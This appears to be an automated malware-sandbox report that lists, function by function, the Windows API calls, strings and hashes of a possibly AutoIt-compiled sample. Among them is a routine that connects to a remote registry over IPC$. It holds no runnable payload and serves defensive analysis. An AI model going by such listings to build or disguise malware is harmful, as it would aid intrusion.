Opcode Fuzzy Hash: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
Instruction Fuzzy Hash: 6D617071508305AFC711EFA4DC85E9FBBE8EFC9310F400A1DF595922A1DB71994ACB52

Function 00A04392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A04424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A0446F

Strings

GETTEXT, xrefs: 00A045C2
ISCHECKED, xrefs: 00A045F2
UNCHECK, xrefs: 00A0464B
GETTOTALCOUNT, xrefs: 00A04456
SELECT, xrefs: 00A04620
GETSELECTED, xrefs: 00A0457F
COLLAPSE, xrefs: 00A044B5
GETITEMCOUNT, xrefs: 00A04551
CHECK, xrefs: 00A0448F
EXPAND, xrefs: 00A04521
EXISTS, xrefs: 00A044D8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
Instruction ID: 436048461ae1a1284bc72ca554ee0f997300d2fe6fb7b8daef84fae9be3e9735
Opcode Fuzzy Hash: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
Instruction Fuzzy Hash: 479138702047159FCB04EF20D851B6AB7A1BFD9354F08886DF9965B3A2DB31ED4ACB81

Function 00A0B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A0B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A091C2), ref: 00A0B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A0B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B9C3
FreeLibrary.KERNEL32(?), ref: 00A0B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0B9DF
DestroyIcon.USER32(?,?,?,?,?,00A091C2), ref: 00A0B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A0BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A0BA17

Part of subcall function 009A2EFD: __wcsicmp_l.LIBCMT ref: 009A2F86

Strings

.icl, xrefs: 00A0B82A
.exe, xrefs: 00A0B84A
.dll, xrefs: 00A0B86D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
Instruction ID: c2f186e05ed98436b81405094b7169c98a1edfadfa49ffc879961d0cfaa95932
Opcode Fuzzy Hash: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
Instruction Fuzzy Hash: 1D61DD71910209BFEB24DF64ED41FBA7BA8EB09710F108519F915E61D0DB74A981DBA0

Function 009EDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009EDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 009EDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009EDCF8
__wsplitpath.LIBCMT ref: 009EDD56
_wcscat.LIBCMT ref: 009EDD6E
_wcscat.LIBCMT ref: 009EDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDFC
_wcscpy.LIBCMT ref: 009EDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009EDE47

Strings

*.*, xrefs: 009EDE02

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
Instruction ID: 11b878c88b7a9471b53c772eaef1fd240f9633c3e3a58bf73fc894df03e1d9a1
Opcode Fuzzy Hash: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
Instruction Fuzzy Hash: EB6168725043459FCB10EF61C844AAEB3E8FF89314F04492EF98997251EB31EE45CB92

Function 009E9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 009E9C7F

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009E9CA0
__swprintf.LIBCMT ref: 009E9CF9
__swprintf.LIBCMT ref: 009E9D12
_wprintf.LIBCMT ref: 009E9DB9
_wprintf.LIBCMT ref: 009E9DD7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 009E9DB4
^ ERROR , xrefs: 009E9D4E
Incorrect parameters to object property !, xrefs: 009E9D5B
"%s" (%d) : ==> %s:, xrefs: 009E9DD2
Line %d (File "%s"):, xrefs: 009E9CF3, 009E9D0C
Error: , xrefs: 009E9D81

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 595651f05e191d39ca2dc161f44ebaac85d65df868a5c115d160f1bfd578b535
Instruction ID: 9cbcc829bda61a7d1508ab87102ee283cfce505b73a882b2b2fd7012bf5cd670
Opcode Fuzzy Hash: 595651f05e191d39ca2dc161f44ebaac85d65df868a5c115d160f1bfd578b535
Instruction Fuzzy Hash: F5517D71900609ABCB15FBE0DD46EEEB778AF44300F600565F505722A2EB356E59CB60

Function 009EA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

CharLowerBuffW.USER32(?,?), ref: 009EA3CB
GetDriveTypeW.KERNEL32 ref: 009EA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA4C5

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

Strings

open, xrefs: 009EA3F2
close cd wait, xrefs: 009EA4B0
type cdaudio alias cd wait, xrefs: 009EA443
open , xrefs: 009EA427
set cd door , xrefs: 009EA466
close, xrefs: 009EA3D1
closed, xrefs: 009EA3DF, 009EA3E8
wait, xrefs: 009EA482

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 30e5e11913d2560a76983b5bbb34932776ccf95a9e0399fbe8189acac0fdf8e3
Instruction ID: 37878792f89affe6a88cd0c09c22e8c0456633cd80ec1cfff02e7aa58e3d8626
Opcode Fuzzy Hash: 30e5e11913d2560a76983b5bbb34932776ccf95a9e0399fbe8189acac0fdf8e3
Instruction Fuzzy Hash: 69514D755043059FC700EF11C891A6AB7E8FF94758F14886DF89A973A1DB31EE0ACB92

Function 009DF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 009DF8DF
LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF8E8

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

GetModuleHandleW.KERNEL32(00000000,00A45310,?,00000FFF,?,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 009DF90A
LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF90D
__swprintf.LIBCMT ref: 009DF95D
__swprintf.LIBCMT ref: 009DF96E
_wprintf.LIBCMT ref: 009DFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009DFA2E

Strings

^ ERROR, xrefs: 009DF9C3
Line %d:, xrefs: 009DF968
%s (%d) : ==> %s: %s %s, xrefs: 009DFA12
Line %d (File "%s"):, xrefs: 009DF957
Error: , xrefs: 009DF9E5

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 6b43fd808504af7466190d6e140abd9c787f21061d203622e9ff0836505355b0
Instruction ID: 3d4c667e117dea5623d8e0674efc049161300c9d9becbdbce828384800a87daa
Opcode Fuzzy Hash: 6b43fd808504af7466190d6e140abd9c787f21061d203622e9ff0836505355b0
Instruction Fuzzy Hash: B3414072804209AACF14FBE0DD57EEEB778AF94310F600465F506B6291EA35AF49CB61

Function 00A0BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A09207,?,?), ref: 00A0BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BA85
GlobalLock.KERNEL32(00000000), ref: 00A0BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00A0BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A09207,?,?,00000000,?), ref: 00A0BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A12CAC,?), ref: 00A0BAD7
GlobalFree.KERNEL32(00000000), ref: 00A0BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00A0BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A0BB36
DeleteObject.GDI32(00000000), ref: 00A0BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A0BB74

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
Instruction ID: 486174ac88d668c8f665f451edc792f82e422767d19f635c0edfcfc6a76dd081
Opcode Fuzzy Hash: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
Instruction Fuzzy Hash: 0E411975600208EFDB21DFA5ED88EAA7BB8FB89711F104168F905E72A0D7719D42CB60

Function 009ED899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 009EDA10
_wcscat.LIBCMT ref: 009EDA28
_wcscat.LIBCMT ref: 009EDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDA63
GetFileAttributesW.KERNEL32(?), ref: 009EDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 009EDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDAA7

Strings

*.*, xrefs: 009EDAE6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
Instruction ID: c0327a65977261cc199fd8dab95a71aee26a75eb9a6a828ff0d1d1c756f55342
Opcode Fuzzy Hash: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
Instruction Fuzzy Hash: 7B81C5715063819FCB25EF66C840A6AB7E8BF89314F184C2EF889CB252E734DD45CB52

Function 00A0C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A0C1FC
GetFocus.USER32 ref: 00A0C20C
GetDlgCtrlID.USER32(00000000), ref: 00A0C217
_memset.LIBCMT ref: 00A0C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A0C36D
GetMenuItemCount.USER32(?), ref: 00A0C38D
GetMenuItemID.USER32(?,00000000), ref: 00A0C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A0C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A0C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A0C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A0C489

Strings

0, xrefs: 00A0C33A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 7670ea3f628ae6e467798abd1737bcba55fad541edde34e717405ba43faa1caf
Instruction ID: 8bfc67c197d9f61f3d1340b824841ffc7c13687f4ff076748a9a8eab264621f8
Opcode Fuzzy Hash: 7670ea3f628ae6e467798abd1737bcba55fad541edde34e717405ba43faa1caf
Instruction Fuzzy Hash: 408181706083099FD720DF64E894ABBBBE4FB88724F004A2DF995972D1D731D905CB92

Function 009F731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009F738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009F739B
CreateCompatibleDC.GDI32(?), ref: 009F73A7
SelectObject.GDI32(00000000,?), ref: 009F73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009F7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009F7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009F7468
SelectObject.GDI32(00000006,?), ref: 009F7470
DeleteObject.GDI32(?), ref: 009F7479
DeleteDC.GDI32(00000006), ref: 009F7480
ReleaseDC.USER32(00000000,?), ref: 009F748B

Strings

(, xrefs: 009F7410

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6502cdc2a7c5678a579adfbe7cdde21ece1da3d7430be6030c2585a3f8f4972a
Instruction ID: 42951b727f9abf8c8bb4f6c56636c436e6a3f43d5402e364d0a13080a18d0176
Opcode Fuzzy Hash: 6502cdc2a7c5678a579adfbe7cdde21ece1da3d7430be6030c2585a3f8f4972a
Instruction Fuzzy Hash: 01515A75904309EFCB24CFA8DC84EAEBBB9EF48310F14842DFA59A7211D771A941CB50

Function 00986A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 009A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00986B0C,?,00008000), ref: 009A0973

Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00986CFA

Part of subcall function 0098586D: _wcscpy.LIBCMT ref: 009858A5

Part of subcall function 009A363D: _iswctype.LIBCMT ref: 009A3645

Strings

Error opening the file, xrefs: 009BE43D, 009BE4B8
Bad directive syntax error, xrefs: 009BE79D
AU3!, xrefs: 00986B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 009BE421
>>>AUTOIT SCRIPT<<<, xrefs: 009BE496
Unterminated string, xrefs: 009BE7E4
EA06, xrefs: 009BE452

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 42cd60e7aec5cce43423144710b55822e6d4a82085873bd36784f8bc0ca7a70c
Instruction ID: 83a77b2a6ee2501d33805fe028fc77aecaf7e48fc6e0f2adbcf56710fd796709
Opcode Fuzzy Hash: 42cd60e7aec5cce43423144710b55822e6d4a82085873bd36784f8bc0ca7a70c
Instruction Fuzzy Hash: 1D0289311083419FCB24EF24C991AAFBBE9AFD9314F14481DF49A973A2DB31D949CB52

Function 009E2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009E2DDD
GetMenuItemCount.USER32(00A45890), ref: 009E2E66
DeleteMenu.USER32(00A45890,00000005,00000000,000000F5,?,?), ref: 009E2EF6
DeleteMenu.USER32(00A45890,00000004,00000000), ref: 009E2EFE
DeleteMenu.USER32(00A45890,00000006,00000000), ref: 009E2F06
DeleteMenu.USER32(00A45890,00000003,00000000), ref: 009E2F0E
GetMenuItemCount.USER32(00A45890), ref: 009E2F16
SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E2F4C
GetCursorPos.USER32(?), ref: 009E2F56
SetForegroundWindow.USER32(00000000), ref: 009E2F5F
TrackPopupMenuEx.USER32(00A45890,00000000,?,00000000,00000000,00000000), ref: 009E2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009E2F7E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 078a3d35e6b220e6717dba28f47e0f51d859be680b2f4c90e549338ec5838594
Instruction ID: 7deb9dbd2fbab1fe1eae868896f097c5a39692153c5fe389e764d016de0785f7
Opcode Fuzzy Hash: 078a3d35e6b220e6717dba28f47e0f51d859be680b2f4c90e549338ec5838594
Instruction Fuzzy Hash: D271F571600299BFEB268F56DC45FAABF6CFF44364F10021AF625AA1E1C7B16C50DB90

Function 009D77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

_memset.LIBCMT ref: 009D786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009D78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009D78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009D78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009D7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009D792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D793A

Strings

\IPC$, xrefs: 009D7882
\CLSID, xrefs: 009D7822
SOFTWARE\Classes\, xrefs: 009D780C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
